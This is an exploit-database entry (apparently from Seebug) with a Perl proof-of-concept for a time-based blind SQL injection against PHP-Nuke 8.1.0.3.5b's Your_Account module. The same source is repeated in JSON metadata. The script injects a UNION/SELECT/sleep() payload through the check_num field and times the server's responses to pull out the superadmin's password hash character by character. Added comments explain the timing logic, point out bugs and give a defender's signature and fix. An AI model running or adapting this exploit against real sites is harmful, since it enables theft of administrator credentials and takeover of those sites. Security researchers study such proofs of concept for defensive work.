ID SSV:69359 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
# PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)
# Author: yawn
# Contact Me: http://www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90
# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes
use strict;
use warnings;
use LWP::UserAgent;
sub Nuke::Bench {
    # Measure the target's baseline response time so the main loop can tell
    # a deliberate server-side delay apart from ordinary network latency.
    # NOTE(review): this reads the global $_ rather than the argument list
    # @_, so $hosto is not the URL the caller passes in.
    my $hosto = $_;
    my $website = LWP::UserAgent->new;
    my $average = 0;
    print "[+] Calculating average load time (may take a while) ...\n";
    # Five plain GETs, each timed with time() (whole-second resolution).
    for (my $i = 0; $i < 5 ; $i++) {
        my $bef = time();
        my $out = $website->get($hosto);   # response content is never inspected
        my $time = time();
        $average += int($time-$bef);
    }
    # Mean elapsed seconds over the five requests.
    return $average/5;
}
sub Nuke::Usage() {
    # Print the command-line help: the single argument is the full URL of
    # the target's modules.php script.  Returns print's status, as before.
    my @lines = (
        'Usage: perl nuke.pl <host>',
        'the host must be the complete path to modules.php',
        'Example: perl nuke.pl http://www.site.com/modules.php',
    );
    return print map { "[+] $_\n" } @lines;
}
sub Nuke::Banner() {
    # Emit the identification banner shown before anything else runs.
    # Returns print's status, like the original.
    my @banner = (
        "Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.1.0.3.5b",
        "I'm not responsable for an illegal use of this exploit",
        "Date: 06-02-2010",
        "Author: yawn",
    );
    return print map { "[+] $_\n" } @banner;
}
Nuke::Banner();
# The only argument is the URL of modules.php.  Nuke::Usage() is evaluated
# before die(), so the help text is printed and die() then receives print's
# return value as its message.
my $host = shift || die Nuke::Usage();
# Every request goes to the Your_Account module's activation handler; the
# username value is arbitrary, the injected field is check_num below.
$host .= "?name=Your_Account&op=activate&username=WTF";
# Baseline latency; the detection threshold further down is this value + 4.
# NOTE(review): Nuke::Bench reads $_ rather than its argument, so the URL
# passed here is not the one it fetches.
my $time = Nuke::Bench($host);
my $attack = LWP::UserAgent->new;
my $pass = "";
$attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9');
# ASCII codes of '0'..'9' and 'a'..'f': one hex digit of the 32-character
# digest is recovered per outer iteration.
my @charset = (48..57, 97..102);
print "[+] Average load time is $time\n";
print "[+] Trying to exploit the SQL Injection\n";
# Time-based blind extraction: for each of the 32 digest positions, POST one
# guess per hex digit; a matching guess makes the database sleep(6) and the
# round trip is compared against the baseline.
# Defender's view: the on-the-wire signature is a long run of POSTs to
# modules.php?name=Your_Account&op=activate, a few seconds apart, whose
# check_num field carries the UNION/SELECT/sleep() payload shown below and
# reads nuke_authors.pwd.  The server-side fix is to validate check_num (or
# bind it as a query parameter) instead of relying on magic_quotes_gpc.
for (my $j = 1; $j <=32; $j++) {
    sleep(3); # PHP-Nuke has a special anti-flood system
    foreach (@charset) {
        sleep(2);
        print "[+] Now trying with $_ \n";
        my $before = time();
        # $resp is never read; only the elapsed time matters.
        my $resp = $attack->post($host,
        { check_num => "'UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1" },
        Referer => $host);
        my $after = time();
        # time() has whole-second resolution; +4 leaves headroom below the
        # six-second server-side sleep.
        if(int($after-$before) > ($time + 4)) {
            print "[+] Success with ".chr($_)."\n";
            $pass .= chr($_);
            # First digit that triggers the delay wins.  If no digit does,
            # nothing is appended for this position and $pass silently comes
            # out shorter than 32 characters.
            last;
        }
    }
}
print "[+] MD5 Hash : $pass\n";
{"href": "https://www.seebug.org/vuldb/ssvid-69359", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69359", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n # PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)\r\n# Author: yawn\r\n# Contact Me: http://www.unitx.net\r\n# Requirements: magic_quotes_gpc : off\r\n# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90\r\n\r\n#\tYou will remember, Watson, how the dreadful business of the\r\n# Abernetty family was first brought to my notice by the depth which the\r\n# parsley had sunk into the butter upon a hot day.\r\n#\t\t -- Sherlock Holmes\r\n\r\nuse strict;\r\nuse warnings;\r\nuse LWP::UserAgent;\r\n\r\nsub Nuke::Bench {\r\n\tmy $hosto = $_;\r\n my $website = LWP::UserAgent->new;\r\n my $average = 0;\r\n print "[+] Calculating average load time (may take a while) ...\\n";\r\n for (my $i = 0; $i < 5 ; $i++) {\r\n my $bef = time();\r\n my $out = $website->get($hosto);\r\n my $time = time();\r\n $average += int($time-$bef);\r\n }\r\n return $average/5;\r\n}\r\n\r\nsub Nuke::Usage() {\r\n print "[+] Usage: perl nuke.pl <host>\\n";\r\n print "[+] the host must be the complete path to modules.php\\n";\r\n print "[+] Example: perl nuke.pl http://www.site.com/modules.php\\n"; \r\n}\r\n\r\nsub Nuke::Banner() {\r\n print "[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.1.0.3.5b\\n";\r\n print "[+] I'm not responsable for an illegal use of this exploit\\n";\r\n print "[+] Date: 06-02-2010\\n";\r\n print "[+] Author: yawn\\n";\r\n}\r\nNuke::Banner();\r\nmy $host = shift || die Nuke::Usage();\r\n$host .= "?name=Your_Account&op=activate&username=WTF";\r\nmy 
$time = Nuke::Bench($host);\r\nmy $attack = LWP::UserAgent->new;\r\nmy $pass = "";\r\n$attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9');\r\nmy @charset = (48..57, 97..102); \r\nprint "[+] Average load time is $time\\n";\r\nprint "[+] Trying to exploit the SQL Injection\\n";\r\n\r\nfor (my $j = 1; $j <=32; $j++) {\r\n\tsleep(3); # PHP-Nuke has a special anti-flood system\r\n\tforeach (@charset) {\r\n\t\tsleep(2);\r\n\t\tprint "[+] Now trying with $_ \\n";\r\n\t\tmy $before = time();\r\n\t\tmy $resp = $attack->post($host,\r\n\t\t{ check_num => "'UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1" }, \r\n\t\tReferer => $host);\r\n\t\tmy $after = time();\r\n\t\tif(int($after-$before) > ($time + 4)) {\r\n\t\t\tprint "[+] Success with ".chr($_)."\\n";\r\n\t\t\t$pass .= chr($_);\r\n\t\t\tlast;\r\n\t\t}\r\n\t}\r\n}\r\nprint "[+] MD5 Hash : $pass\\n";\r\n\r\n\r\n\n ", "id": "SSV:69359", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:09:49", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-11-19T17:09:49", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T17:09:49", "rev": 2}, "vulnersScore": -0.4}, "references": []}